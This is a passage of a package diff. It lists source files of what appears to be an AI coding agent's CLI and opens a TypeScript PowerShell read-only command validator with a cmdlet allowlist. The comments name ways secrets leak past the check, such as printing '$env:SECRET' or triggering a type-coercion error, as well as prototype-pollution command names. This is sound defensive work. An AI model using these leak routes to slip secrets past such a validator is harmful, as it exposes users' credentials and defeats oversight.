  1555. package/src/utils/hooks/hooksConfigManager.ts +400 -0
  1556. package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
  1557. package/src/utils/hooks/hooksSettings.ts +271 -0
  1558. package/src/utils/hooks/postSamplingHooks.ts +70 -0
  1559. package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
  1560. package/src/utils/hooks/registerSkillHooks.ts +64 -0
  1561. package/src/utils/hooks/sessionHooks.ts +447 -0
  1562. package/src/utils/hooks/skillImprovement.ts +267 -0
  1563. package/src/utils/hooks/ssrfGuard.ts +294 -0
  1564. package/src/utils/hooks.ts +5022 -0
  1565. package/src/utils/horizontalScroll.ts +137 -0
  1566. package/src/utils/http.ts +136 -0
  1567. package/src/utils/hyperlink.ts +39 -0
  1568. package/src/utils/iTermBackup.ts +73 -0
  1569. package/src/utils/ide.ts +1494 -0
  1570. package/src/utils/idePathConversion.ts +90 -0
  1571. package/src/utils/idleTimeout.ts +53 -0
  1572. package/src/utils/imagePaste.ts +416 -0
  1573. package/src/utils/imageResizer.ts +880 -0
  1574. package/src/utils/imageStore.ts +167 -0
  1575. package/src/utils/imageValidation.ts +104 -0
  1576. package/src/utils/immediateCommand.ts +15 -0
  1577. package/src/utils/inProcessTeammateHelpers.ts +102 -0
  1578. package/src/utils/ink.ts +26 -0
  1579. package/src/utils/intl.ts +94 -0
  1580. package/src/utils/jetbrains.ts +191 -0
  1581. package/src/utils/json.ts +277 -0
  1582. package/src/utils/jsonRead.ts +16 -0
  1583. package/src/utils/keyboardShortcuts.ts +14 -0
  1584. package/src/utils/lazySchema.ts +8 -0
  1585. package/src/utils/listSessionsImpl.ts +454 -0
  1586. package/src/utils/localInstaller.ts +162 -0
  1587. package/src/utils/lockfile.ts +43 -0
  1588. package/src/utils/log.ts +362 -0
  1589. package/src/utils/logoV2Utils.ts +350 -0
  1590. package/src/utils/mailbox.ts +73 -0
  1591. package/src/utils/managedEnv.ts +199 -0
  1592. package/src/utils/managedEnvConstants.ts +191 -0
  1593. package/src/utils/markdown.ts +381 -0
  1594. package/src/utils/markdownConfigLoader.ts +600 -0
  1595. package/src/utils/mcp/dateTimeParser.ts +121 -0
  1596. package/src/utils/mcp/elicitationValidation.ts +336 -0
  1597. package/src/utils/mcpInstructionsDelta.ts +130 -0
  1598. package/src/utils/mcpOutputStorage.ts +189 -0
  1599. package/src/utils/mcpValidation.ts +208 -0
  1600. package/src/utils/mcpWebSocketTransport.ts +200 -0
  1601. package/src/utils/memoize.ts +269 -0
  1602. package/src/utils/memory/types.ts +12 -0
  1603. package/src/utils/memory/versions.ts +8 -0
  1604. package/src/utils/memoryFileDetection.ts +289 -0
  1605. package/src/utils/messagePredicates.ts +8 -0
  1606. package/src/utils/messageQueueManager.ts +547 -0
  1607. package/src/utils/messages/mappers.ts +290 -0
  1608. package/src/utils/messages/systemInit.ts +96 -0
  1609. package/src/utils/messages.ts +5512 -0
  1610. package/src/utils/model/agent.ts +157 -0
  1611. package/src/utils/model/aliases.ts +25 -0
  1612. package/src/utils/model/antModels.ts +64 -0
  1613. package/src/utils/model/bedrock.ts +265 -0
  1614. package/src/utils/model/check1mAccess.ts +72 -0
  1615. package/src/utils/model/configs.ts +118 -0
  1616. package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
  1617. package/src/utils/model/deprecation.ts +101 -0
  1618. package/src/utils/model/model.ts +634 -0
  1619. package/src/utils/model/modelAllowlist.ts +170 -0
  1620. package/src/utils/model/modelCapabilities.ts +118 -0
  1621. package/src/utils/model/modelOptions.ts +540 -0
  1622. package/src/utils/model/modelStrings.ts +166 -0
  1623. package/src/utils/model/modelSupportOverrides.ts +50 -0
  1624. package/src/utils/model/providers.ts +46 -0
  1625. package/src/utils/model/validateModel.ts +159 -0
  1626. package/src/utils/modelCost.ts +235 -0
  1627. package/src/utils/modifiers.ts +36 -0
  1628. package/src/utils/mtls.ts +179 -0
  1629. package/src/utils/nativeInstaller/download.ts +523 -0
  1630. package/src/utils/nativeInstaller/index.ts +18 -0
  1631. package/src/utils/nativeInstaller/installer.ts +1708 -0
  1632. package/src/utils/nativeInstaller/packageManagers.ts +336 -0
  1633. package/src/utils/nativeInstaller/pidLock.ts +433 -0
  1634. package/src/utils/notebook.ts +224 -0
  1635. package/src/utils/objectGroupBy.ts +18 -0
  1636. package/src/utils/pasteStore.ts +104 -0
  1637. package/src/utils/path.ts +155 -0
  1638. package/src/utils/pdf.ts +300 -0
  1639. package/src/utils/pdfUtils.ts +70 -0
  1640. package/src/utils/peerAddress.ts +21 -0
  1641. package/src/utils/permissions/PermissionMode.ts +141 -0
  1642. package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
  1643. package/src/utils/permissions/PermissionResult.ts +35 -0
  1644. package/src/utils/permissions/PermissionRule.ts +40 -0
  1645. package/src/utils/permissions/PermissionUpdate.ts +389 -0
  1646. package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
  1647. package/src/utils/permissions/autoModeState.ts +39 -0
  1648. package/src/utils/permissions/bashClassifier.ts +61 -0
  1649. package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
  1650. package/src/utils/permissions/classifierDecision.ts +98 -0
  1651. package/src/utils/permissions/classifierShared.ts +39 -0
  1652. package/src/utils/permissions/dangerousPatterns.ts +80 -0
  1653. package/src/utils/permissions/denialTracking.ts +45 -0
  1654. package/src/utils/permissions/filesystem.ts +1777 -0
  1655. package/src/utils/permissions/getNextPermissionMode.ts +101 -0
  1656. package/src/utils/permissions/pathValidation.ts +485 -0
  1657. package/src/utils/permissions/permissionExplainer.ts +250 -0
  1658. package/src/utils/permissions/permissionRuleParser.ts +198 -0
  1659. package/src/utils/permissions/permissionSetup.ts +1532 -0
  1660. package/src/utils/permissions/permissions.ts +1486 -0
  1661. package/src/utils/permissions/permissionsLoader.ts +296 -0
  1662. package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
  1663. package/src/utils/permissions/shellRuleMatching.ts +228 -0
  1664. package/src/utils/permissions/yoloClassifier.ts +1495 -0
  1665. package/src/utils/planModeV2.ts +95 -0
  1666. package/src/utils/plans.ts +397 -0
  1667. package/src/utils/platform.ts +150 -0
  1668. package/src/utils/plugins/addDirPluginSettings.ts +71 -0
  1669. package/src/utils/plugins/cacheUtils.ts +196 -0
  1670. package/src/utils/plugins/dependencyResolver.ts +305 -0
  1671. package/src/utils/plugins/fetchTelemetry.ts +135 -0
  1672. package/src/utils/plugins/gitAvailability.ts +69 -0
  1673. package/src/utils/plugins/headlessPluginInstall.ts +174 -0
  1674. package/src/utils/plugins/hintRecommendation.ts +164 -0
  1675. package/src/utils/plugins/installCounts.ts +292 -0
  1676. package/src/utils/plugins/installedPluginsManager.ts +1268 -0
  1677. package/src/utils/plugins/loadPluginAgents.ts +348 -0
  1678. package/src/utils/plugins/loadPluginCommands.ts +946 -0
  1679. package/src/utils/plugins/loadPluginHooks.ts +287 -0
  1680. package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
  1681. package/src/utils/plugins/lspPluginIntegration.ts +387 -0
  1682. package/src/utils/plugins/lspRecommendation.ts +374 -0
  1683. package/src/utils/plugins/managedPlugins.ts +27 -0
  1684. package/src/utils/plugins/marketplaceHelpers.ts +592 -0
  1685. package/src/utils/plugins/marketplaceManager.ts +2643 -0
  1686. package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
  1687. package/src/utils/plugins/mcpbHandler.ts +968 -0
  1688. package/src/utils/plugins/officialMarketplace.ts +25 -0
  1689. package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
  1690. package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
  1691. package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
  1692. package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
  1693. package/src/utils/plugins/performStartupChecks.tsx +70 -0
  1694. package/src/utils/plugins/pluginAutoupdate.ts +284 -0
  1695. package/src/utils/plugins/pluginBlocklist.ts +127 -0
  1696. package/src/utils/plugins/pluginDirectories.ts +178 -0
  1697. package/src/utils/plugins/pluginFlagging.ts +208 -0
  1698. package/src/utils/plugins/pluginIdentifier.ts +123 -0
  1699. package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
  1700. package/src/utils/plugins/pluginLoader.ts +3302 -0
  1701. package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
  1702. package/src/utils/plugins/pluginPolicy.ts +20 -0
  1703. package/src/utils/plugins/pluginStartupCheck.ts +341 -0
  1704. package/src/utils/plugins/pluginVersioning.ts +157 -0
  1705. package/src/utils/plugins/reconciler.ts +265 -0
  1706. package/src/utils/plugins/refresh.ts +215 -0
  1707. package/src/utils/plugins/schemas.ts +1681 -0
  1708. package/src/utils/plugins/validatePlugin.ts +903 -0
  1709. package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
  1710. package/src/utils/plugins/zipCache.ts +406 -0
  1711. package/src/utils/plugins/zipCacheAdapters.ts +164 -0
  1712. package/src/utils/powershell/dangerousCmdlets.ts +185 -0
  1713. package/src/utils/powershell/parser.ts +1804 -0
  1714. package/src/utils/powershell/staticPrefix.ts +316 -0
  1715. package/src/utils/preflightChecks.tsx +151 -0
  1716. package/src/utils/privacyLevel.ts +55 -0
  1717. package/src/utils/process.ts +68 -0
  1718. package/src/utils/processUserInput/processBashCommand.tsx +140 -0
  1719. package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
  1720. package/src/utils/processUserInput/processTextPrompt.ts +100 -0
  1721. package/src/utils/processUserInput/processUserInput.ts +605 -0
  1722. package/src/utils/profilerBase.ts +46 -0
  1723. package/src/utils/promptCategory.ts +49 -0
  1724. package/src/utils/promptEditor.ts +188 -0
  1725. package/src/utils/promptShellExecution.ts +183 -0
  1726. package/src/utils/proxy.ts +426 -0
  1727. package/src/utils/queryContext.ts +179 -0
  1728. package/src/utils/queryHelpers.ts +552 -0
  1729. package/src/utils/queryProfiler.ts +301 -0
  1730. package/src/utils/queueProcessor.ts +95 -0
  1731. package/src/utils/readEditContext.ts +227 -0
  1732. package/src/utils/readFileInRange.ts +383 -0
  1733. package/src/utils/releaseNotes.ts +360 -0
  1734. package/src/utils/renderOptions.ts +77 -0
  1735. package/src/utils/ripgrep.ts +679 -0
  1736. package/src/utils/sandbox/sandbox-adapter.ts +985 -0
  1737. package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
  1738. package/src/utils/sanitization.ts +91 -0
  1739. package/src/utils/screenshotClipboard.ts +121 -0
  1740. package/src/utils/sdkEventQueue.ts +134 -0
  1741. package/src/utils/secureStorage/fallbackStorage.ts +70 -0
  1742. package/src/utils/secureStorage/index.ts +17 -0
  1743. package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
  1744. package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
  1745. package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
  1746. package/src/utils/secureStorage/plainTextStorage.ts +84 -0
  1747. package/src/utils/semanticBoolean.ts +29 -0
  1748. package/src/utils/semanticNumber.ts +36 -0
  1749. package/src/utils/semver.ts +59 -0
  1750. package/src/utils/sequential.ts +56 -0
  1751. package/src/utils/sessionActivity.ts +133 -0
  1752. package/src/utils/sessionEnvVars.ts +22 -0
  1753. package/src/utils/sessionEnvironment.ts +166 -0
  1754. package/src/utils/sessionFileAccessHooks.ts +250 -0
  1755. package/src/utils/sessionIngressAuth.ts +140 -0
  1756. package/src/utils/sessionRestore.ts +551 -0
  1757. package/src/utils/sessionStart.ts +232 -0
  1758. package/src/utils/sessionState.ts +150 -0
  1759. package/src/utils/sessionStorage.ts +5105 -0
  1760. package/src/utils/sessionStoragePortable.ts +793 -0
  1761. package/src/utils/sessionTitle.ts +129 -0
  1762. package/src/utils/sessionUrl.ts +64 -0
  1763. package/src/utils/set.ts +53 -0
  1764. package/src/utils/settings/allErrors.ts +32 -0
  1765. package/src/utils/settings/applySettingsChange.ts +92 -0
  1766. package/src/utils/settings/changeDetector.ts +488 -0
  1767. package/src/utils/settings/constants.ts +202 -0
  1768. package/src/utils/settings/internalWrites.ts +37 -0
  1769. package/src/utils/settings/managedPath.ts +34 -0
  1770. package/src/utils/settings/mdm/constants.ts +81 -0
  1771. package/src/utils/settings/mdm/rawRead.ts +130 -0
  1772. package/src/utils/settings/mdm/settings.ts +316 -0
  1773. package/src/utils/settings/permissionValidation.ts +262 -0
  1774. package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
  1775. package/src/utils/settings/schemaOutput.ts +8 -0
  1776. package/src/utils/settings/settings.ts +1015 -0
  1777. package/src/utils/settings/settingsCache.ts +80 -0
  1778. package/src/utils/settings/toolValidationConfig.ts +103 -0
  1779. package/src/utils/settings/types.ts +1148 -0
  1780. package/src/utils/settings/validateEditTool.ts +45 -0
  1781. package/src/utils/settings/validation.ts +265 -0
  1782. package/src/utils/settings/validationTips.ts +164 -0
  1783. package/src/utils/shell/bashProvider.ts +255 -0
  1784. package/src/utils/shell/outputLimits.ts +14 -0
  1785. package/src/utils/shell/powershellDetection.ts +107 -0
  1786. package/src/utils/shell/powershellProvider.ts +123 -0
  1787. package/src/utils/shell/prefix.ts +367 -0
  1788. package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
  1789. package/src/utils/shell/resolveDefaultShell.ts +14 -0
  1790. package/src/utils/shell/shellProvider.ts +33 -0
  1791. package/src/utils/shell/shellToolUtils.ts +22 -0
  1792. package/src/utils/shell/specPrefix.ts +241 -0
  1793. package/src/utils/shellConfig.ts +167 -0
  1794. package/src/utils/sideQuery.ts +222 -0
  1795. package/src/utils/sideQuestion.ts +155 -0
  1796. package/src/utils/signal.ts +43 -0
  1797. package/src/utils/sinks.ts +16 -0
  1798. package/src/utils/skills/skillChangeDetector.ts +311 -0
  1799. package/src/utils/slashCommandParsing.ts +60 -0
  1800. package/src/utils/sleep.ts +84 -0
  1801. package/src/utils/sliceAnsi.ts +91 -0
  1802. package/src/utils/slowOperations.ts +286 -0
  1803. package/src/utils/standaloneAgent.ts +23 -0
  1804. package/src/utils/startupProfiler.ts +194 -0
  1805. package/src/utils/staticRender.tsx +116 -0
  1806. package/src/utils/stats.ts +1061 -0
  1807. package/src/utils/statsCache.ts +434 -0
  1808. package/src/utils/status.tsx +362 -0
  1809. package/src/utils/statusNoticeDefinitions.tsx +198 -0
  1810. package/src/utils/statusNoticeHelpers.ts +20 -0
  1811. package/src/utils/stream.ts +76 -0
  1812. package/src/utils/streamJsonStdoutGuard.ts +123 -0
  1813. package/src/utils/streamlinedTransform.ts +201 -0
  1814. package/src/utils/stringUtils.ts +235 -0
  1815. package/src/utils/subprocessEnv.ts +99 -0
  1816. package/src/utils/suggestions/commandSuggestions.ts +567 -0
  1817. package/src/utils/suggestions/directoryCompletion.ts +263 -0
  1818. package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
  1819. package/src/utils/suggestions/skillUsageTracking.ts +55 -0
  1820. package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
  1821. package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
  1822. package/src/utils/swarm/backends/ITermBackend.ts +370 -0
  1823. package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
  1824. package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
  1825. package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
  1826. package/src/utils/swarm/backends/detection.ts +128 -0
  1827. package/src/utils/swarm/backends/it2Setup.ts +245 -0
  1828. package/src/utils/swarm/backends/registry.ts +464 -0
  1829. package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
  1830. package/src/utils/swarm/backends/types.ts +311 -0
  1831. package/src/utils/swarm/constants.ts +33 -0
  1832. package/src/utils/swarm/inProcessRunner.ts +1552 -0
  1833. package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
  1834. package/src/utils/swarm/permissionSync.ts +928 -0
  1835. package/src/utils/swarm/reconnection.ts +119 -0
  1836. package/src/utils/swarm/spawnInProcess.ts +328 -0
  1837. package/src/utils/swarm/spawnUtils.ts +146 -0
  1838. package/src/utils/swarm/teamHelpers.ts +683 -0
  1839. package/src/utils/swarm/teammateInit.ts +129 -0
  1840. package/src/utils/swarm/teammateLayoutManager.ts +107 -0
  1841. package/src/utils/swarm/teammateModel.ts +10 -0
  1842. package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
  1843. package/src/utils/systemDirectories.ts +74 -0
  1844. package/src/utils/systemPrompt.ts +123 -0
  1845. package/src/utils/systemPromptType.ts +14 -0
  1846. package/src/utils/systemTheme.ts +119 -0
  1847. package/src/utils/taggedId.ts +54 -0
  1848. package/src/utils/task/TaskOutput.ts +390 -0
  1849. package/src/utils/task/diskOutput.ts +451 -0
  1850. package/src/utils/task/framework.ts +308 -0
  1851. package/src/utils/task/outputFormatting.ts +38 -0
  1852. package/src/utils/task/sdkProgress.ts +36 -0
  1853. package/src/utils/tasks.ts +862 -0
  1854. package/src/utils/teamDiscovery.ts +81 -0
  1855. package/src/utils/teamMemoryOps.ts +88 -0
  1856. package/src/utils/teammate.ts +292 -0
  1857. package/src/utils/teammateContext.ts +96 -0
  1858. package/src/utils/teammateMailbox.ts +1183 -0
  1859. package/src/utils/telemetry/betaSessionTracing.ts +491 -0
  1860. package/src/utils/telemetry/bigqueryExporter.ts +252 -0
  1861. package/src/utils/telemetry/events.ts +75 -0
  1862. package/src/utils/telemetry/instrumentation.ts +825 -0
  1863. package/src/utils/telemetry/logger.ts +26 -0
  1864. package/src/utils/telemetry/perfettoTracing.ts +1120 -0
  1865. package/src/utils/telemetry/pluginTelemetry.ts +289 -0
  1866. package/src/utils/telemetry/sessionTracing.ts +927 -0
  1867. package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
  1868. package/src/utils/telemetryAttributes.ts +71 -0
  1869. package/src/utils/teleport/api.ts +466 -0
  1870. package/src/utils/teleport/environmentSelection.ts +77 -0
  1871. package/src/utils/teleport/environments.ts +120 -0
  1872. package/src/utils/teleport/gitBundle.ts +292 -0
  1873. package/src/utils/teleport.tsx +1226 -0
  1874. package/src/utils/tempfile.ts +31 -0
  1875. package/src/utils/terminal.ts +131 -0
  1876. package/src/utils/terminalPanel.ts +191 -0
  1877. package/src/utils/textHighlighting.ts +166 -0
  1878. package/src/utils/theme.ts +639 -0
  1879. package/src/utils/thinking.ts +162 -0
  1880. package/src/utils/timeouts.ts +39 -0
  1881. package/src/utils/tmuxSocket.ts +427 -0
  1882. package/src/utils/todo/types.ts +18 -0
  1883. package/src/utils/tokenBudget.ts +73 -0
  1884. package/src/utils/tokens.ts +261 -0
  1885. package/src/utils/toolErrors.ts +132 -0
  1886. package/src/utils/toolPool.ts +79 -0
  1887. package/src/utils/toolResultStorage.ts +1040 -0
  1888. package/src/utils/toolSchemaCache.ts +26 -0
  1889. package/src/utils/toolSearch.ts +756 -0
  1890. package/src/utils/transcriptSearch.ts +202 -0
  1891. package/src/utils/treeify.ts +170 -0
  1892. package/src/utils/truncate.ts +179 -0
  1893. package/src/utils/ultraplan/ccrSession.ts +349 -0
  1894. package/src/utils/ultraplan/keyword.ts +127 -0
  1895. package/src/utils/ultraplan/prompt.txt +1 -0
  1896. package/src/utils/unaryLogging.ts +39 -0
  1897. package/src/utils/undercover.ts +89 -0
  1898. package/src/utils/user.ts +194 -0
  1899. package/src/utils/userAgent.ts +10 -0
  1900. package/src/utils/userPromptKeywords.ts +27 -0
  1901. package/src/utils/uuid.ts +27 -0
  1902. package/src/utils/warningHandler.ts +121 -0
  1903. package/src/utils/which.ts +82 -0
  1904. package/src/utils/windowsPaths.ts +173 -0
  1905. package/src/utils/withResolvers.ts +13 -0
  1906. package/src/utils/words.ts +800 -0
  1907. package/src/utils/workloadContext.ts +57 -0
  1908. package/src/utils/worktree.ts +1519 -0
  1909. package/src/utils/worktreeModeEnabled.ts +11 -0
  1910. package/src/utils/xdg.ts +65 -0
  1911. package/src/utils/xml.ts +16 -0
  1912. package/src/utils/yaml.ts +15 -0
  1913. package/src/utils/zodToJsonSchema.ts +23 -0
  1914. package/src/vim/motions.ts +82 -0
  1915. package/src/vim/operators.ts +556 -0
  1916. package/src/vim/textObjects.ts +186 -0
  1917. package/src/vim/transitions.ts +490 -0
  1918. package/src/vim/types.ts +199 -0
  1919. package/src/voice/voiceModeEnabled.ts +54 -0
  1920. package/start.js +1 -0
@@ -0,0 +1,1823 @@
1
+ /**
2
+ * PowerShell read-only command validation.
3
+ *
4
+ * Cmdlets are case-insensitive; all matching is done in lowercase.
5
+ */
6
+
7
+ import type {
8
+ ParsedCommandElement,
9
+ ParsedPowerShellCommand,
10
+ } from '../../utils/powershell/parser.js'
11
+
12
+ type ParsedStatement = ParsedPowerShellCommand['statements'][number]
13
+
14
+ import { getPlatform } from '../../utils/platform.js'
15
+ import {
16
+ COMMON_ALIASES,
17
+ deriveSecurityFlags,
18
+ getPipelineSegments,
19
+ isNullRedirectionTarget,
20
+ isPowerShellParameter,
21
+ } from '../../utils/powershell/parser.js'
22
+ import type { ExternalCommandConfig } from '../../utils/shell/readOnlyCommandValidation.js'
23
+ import {
24
+ DOCKER_READ_ONLY_COMMANDS,
25
+ EXTERNAL_READONLY_COMMANDS,
26
+ GH_READ_ONLY_COMMANDS,
27
+ GIT_READ_ONLY_COMMANDS,
28
+ validateFlags,
29
+ } from '../../utils/shell/readOnlyCommandValidation.js'
30
+ import { COMMON_PARAMETERS } from './commonParameters.js'
31
+
32
+ const DOTNET_READ_ONLY_FLAGS = new Set([
33
+ '--version',
34
+ '--info',
35
+ '--list-runtimes',
36
+ '--list-sdks',
37
+ ])
38
+
39
+ type CommandConfig = {
40
+ /** Safe subcommands or flags for this command */
41
+ safeFlags?: string[]
42
+ /**
43
+ * When true, all flags are allowed regardless of safeFlags.
44
+ * Use for commands whose entire flag surface is read-only (e.g., hostname).
45
+ * Without this, an empty/missing safeFlags rejects all flags (positional
46
+ * args only).
47
+ */
48
+ allowAllFlags?: boolean
49
+ /** Regex constraint on the original command */
50
+ regex?: RegExp
51
+ /** Additional validation callback - returns true if command is dangerous */
52
+ additionalCommandIsDangerousCallback?: (
53
+ command: string,
54
+ element?: ParsedCommandElement,
55
+ ) => boolean
56
+ }
57
+
58
+ /**
59
+ * Shared callback for cmdlets that print or coerce their args to stdout/
60
+ * stderr. `Write-Output $env:SECRET` prints it directly; `Start-Sleep
61
+ * $env:SECRET` leaks via type-coerce error ("Cannot convert value 'sk-...'
62
+ * to System.Double"). Bash's echo regex WHITELISTS safe chars per token.
63
+ *
64
+ * Two checks:
65
+ * 1. elementTypes whitelist — StringConstant (literals) + Parameter (flag
66
+ * names). Rejects Variable, Other (HashtableAst/ConvertExpressionAst/
67
+ * BinaryExpressionAst all map to Other), ScriptBlock, SubExpression,
68
+ * ExpandableString. Same pattern as SAFE_PATH_ELEMENT_TYPES.
69
+ * 2. Colon-bound parameter value — `-InputObject:$env:SECRET` creates a
70
+ * SINGLE CommandParameterAst; the VariableExpressionAst is its .Argument
71
+ * child, not a separate CommandElement. elementTypes = [..., 'Parameter'],
72
+ * whitelist passes. Query children[] for the .Argument's mapped type;
73
+ * anything other than StringConstant (Variable, ParenExpression wrapping
74
+ * arbitrary pipelines, Hashtable, etc.) is a leak vector.
75
+ */
76
+ export function argLeaksValue(
77
+ _cmd: string,
78
+ element?: ParsedCommandElement,
79
+ ): boolean {
80
+ const argTypes = (element?.elementTypes ?? []).slice(1)
81
+ const args = element?.args ?? []
82
+ const children = element?.children
83
+ for (let i = 0; i < argTypes.length; i++) {
84
+ if (argTypes[i] !== 'StringConstant' && argTypes[i] !== 'Parameter') {
85
+ // ArrayLiteralAst (`Select-Object Name, Id`) maps to 'Other' — the
86
+ // parse script only populates children for CommandParameterAst.Argument,
87
+ // so we can't inspect elements. Fall back to string-archaeology on the
88
+ // extent text: Hashtable has `@{`, ParenExpr has `(`, variables have
89
+ // `$`, type literals have `[`, scriptblocks have `{`. A comma-list of
90
+ // bare identifiers has none. `Name, $x` still rejects on `$`.
91
+ if (!/[$(@{[]/.test(args[i] ?? '')) {
92
+ continue
93
+ }
94
+ return true
95
+ }
96
+ if (argTypes[i] === 'Parameter') {
97
+ const paramChildren = children?.[i]
98
+ if (paramChildren) {
99
+ if (paramChildren.some(c => c.type !== 'StringConstant')) {
100
+ return true
101
+ }
102
+ } else {
103
+ // Fallback: string-archaeology on arg text (pre-children parsers).
104
+ // Reject `$` (variable), `(` (ParenExpressionAst), `@` (hash/array
105
+ // sub), `{` (scriptblock), `[` (type literal/static method).
106
+ const arg = args[i] ?? ''
107
+ const colonIdx = arg.indexOf(':')
108
+ if (colonIdx > 0 && /[$(@{[]/.test(arg.slice(colonIdx + 1))) {
109
+ return true
110
+ }
111
+ }
112
+ }
113
+ }
114
+ return false
115
+ }
116
+
117
+ /**
118
+ * Allowlist of PowerShell cmdlets that are considered read-only.
119
+ * Each cmdlet maps to its configuration including safe flags.
120
+ *
121
+ * Note: PowerShell cmdlets are case-insensitive, so we store keys in lowercase
122
+ * and normalize input for matching.
123
+ *
124
+ * Uses Object.create(null) to prevent prototype-chain pollution — attacker-
125
+ * controlled command names like 'constructor' or '__proto__' must return
126
+ * undefined, not inherited Object.prototype properties. Same defense as
127
+ * COMMON_ALIASES in parser.ts.
128
+ */
129
+ export const CMDLET_ALLOWLIST: Record<string, CommandConfig> = Object.assign(
130
+ Object.create(null) as Record<string, CommandConfig>,
131
+ {
132
+ // =========================================================================
133
+ // PowerShell Cmdlets - Filesystem (read-only)
134
+ // =========================================================================
135
+ 'get-childitem': {
136
+ safeFlags: [
137
+ '-Path',
138
+ '-LiteralPath',
139
+ '-Filter',
140
+ '-Include',
141
+ '-Exclude',
142
+ '-Recurse',
143
+ '-Depth',
144
+ '-Name',
145
+ '-Force',
146
+ '-Attributes',
147
+ '-Directory',
148
+ '-File',
149
+ '-Hidden',
150
+ '-ReadOnly',
151
+ '-System',
152
+ ],
153
+ },
154
+ 'get-content': {
155
+ safeFlags: [
156
+ '-Path',
157
+ '-LiteralPath',
158
+ '-TotalCount',
159
+ '-Head',
160
+ '-Tail',
161
+ '-Raw',
162
+ '-Encoding',
163
+ '-Delimiter',
164
+ '-ReadCount',
165
+ ],
166
+ },
167
+ 'get-item': {
168
+ safeFlags: ['-Path', '-LiteralPath', '-Force', '-Stream'],
169
+ },
170
+ 'get-itemproperty': {
171
+ safeFlags: ['-Path', '-LiteralPath', '-Name'],
172
+ },
173
+ 'test-path': {
174
+ safeFlags: [
175
+ '-Path',
176
+ '-LiteralPath',
177
+ '-PathType',
178
+ '-Filter',
179
+ '-Include',
180
+ '-Exclude',
181
+ '-IsValid',
182
+ '-NewerThan',
183
+ '-OlderThan',
184
+ ],
185
+ },
186
+ 'resolve-path': {
187
+ safeFlags: ['-Path', '-LiteralPath', '-Relative'],
188
+ },
189
+ 'get-filehash': {
190
+ safeFlags: ['-Path', '-LiteralPath', '-Algorithm', '-InputStream'],
191
+ },
192
+ 'get-acl': {
193
+ safeFlags: [
194
+ '-Path',
195
+ '-LiteralPath',
196
+ '-Audit',
197
+ '-Filter',
198
+ '-Include',
199
+ '-Exclude',
200
+ ],
201
+ },
202
+
203
+ // =========================================================================
204
+ // PowerShell Cmdlets - Navigation (read-only, just changes working directory)
205
+ // =========================================================================
206
+ 'set-location': {
207
+ safeFlags: ['-Path', '-LiteralPath', '-PassThru', '-StackName'],
208
+ },
209
+ 'push-location': {
210
+ safeFlags: ['-Path', '-LiteralPath', '-PassThru', '-StackName'],
211
+ },
212
+ 'pop-location': {
213
+ safeFlags: ['-PassThru', '-StackName'],
214
+ },
215
+
216
+ // =========================================================================
217
+ // PowerShell Cmdlets - Text searching/filtering (read-only)
218
+ // =========================================================================
219
+ 'select-string': {
220
+ safeFlags: [
221
+ '-Path',
222
+ '-LiteralPath',
223
+ '-Pattern',
224
+ '-InputObject',
225
+ '-SimpleMatch',
226
+ '-CaseSensitive',
227
+ '-Quiet',
228
+ '-List',
229
+ '-NotMatch',
230
+ '-AllMatches',
231
+ '-Encoding',
232
+ '-Context',
233
+ '-Raw',
234
+ '-NoEmphasis',
235
+ ],
236
+ },
237
+
238
+ // =========================================================================
239
+ // PowerShell Cmdlets - Data conversion (pure transforms, no side effects)
240
+ // =========================================================================
241
+ 'convertto-json': {
242
+ safeFlags: [
243
+ '-InputObject',
244
+ '-Depth',
245
+ '-Compress',
246
+ '-EnumsAsStrings',
247
+ '-AsArray',
248
+ ],
249
+ },
250
+ 'convertfrom-json': {
251
+ safeFlags: ['-InputObject', '-Depth', '-AsHashtable', '-NoEnumerate'],
252
+ },
253
+ 'convertto-csv': {
254
+ safeFlags: [
255
+ '-InputObject',
256
+ '-Delimiter',
257
+ '-NoTypeInformation',
258
+ '-NoHeader',
259
+ '-UseQuotes',
260
+ ],
261
+ },
262
+ 'convertfrom-csv': {
263
+ safeFlags: ['-InputObject', '-Delimiter', '-Header', '-UseCulture'],
264
+ },
265
+ 'convertto-xml': {
266
+ safeFlags: ['-InputObject', '-Depth', '-As', '-NoTypeInformation'],
267
+ },
268
+ 'convertto-html': {
269
+ safeFlags: [
270
+ '-InputObject',
271
+ '-Property',
272
+ '-Head',
273
+ '-Title',
274
+ '-Body',
275
+ '-Pre',
276
+ '-Post',
277
+ '-As',
278
+ '-Fragment',
279
+ ],
280
+ },
281
+ 'format-hex': {
282
+ safeFlags: [
283
+ '-Path',
284
+ '-LiteralPath',
285
+ '-InputObject',
286
+ '-Encoding',
287
+ '-Count',
288
+ '-Offset',
289
+ ],
290
+ },
291
+
292
+ // =========================================================================
293
+ // PowerShell Cmdlets - Object inspection and manipulation (read-only)
294
+ // =========================================================================
295
+ 'get-member': {
296
+ safeFlags: [
297
+ '-InputObject',
298
